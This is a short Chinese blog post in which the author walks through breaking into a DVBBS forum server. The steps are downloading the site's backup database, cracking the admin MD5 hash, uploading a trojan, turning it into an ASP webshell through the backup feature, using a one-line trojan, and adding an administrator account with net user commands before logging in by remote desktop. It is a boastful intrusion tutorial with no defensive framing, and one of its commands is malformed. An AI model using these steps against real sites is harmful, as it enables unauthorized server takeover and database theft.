首先：用默认的数据库试试http:///www.xxx.com/data/dvbbs7.mdb。。。

呵呵。。。被改了。。。

再试试找他备份的数据库。。。哈哈找到了。。。。
找到后http:///www.xxx.com/Databackup/dvbbs7_Backup.mdb下载。。。

用明小子3.6打开数据库。。。。看下管理员的密码。。。

用MD5破密码   推荐www.cmd5.com。。。。
拿到管理员密码之后
登陆论坛 发新帖子 上传马（马不给大家了。。呵呵）
后台 搜索上传内容找到真实路径
然后备份成asp的shell,将马备份成webshell http://www.xxx.com/bbs/Databackup/zhu.asp
登陆http://www.xxx.com/bbs/Databackup/zhu.asp上传提权马。。。

晕倒~~这个服务器禁止上传asp文件

想想。。。
用一句话：http://www.52shell.com/l.htm 一句话木马 后面内容填自己的马的代码

呵呵。。。成功了。。。。

然后就是提权了。。。。

net user xxxx 123456 /add

net user localgroup administrators xxxx /add。。。

完胜。。。。

在自己电脑上 开始-运行-mstsc--IP地址。。。

嘿嘿。。。拿到服务器啦```

本文出自 “coco_菜鸟” 博客，转载请与作者联系！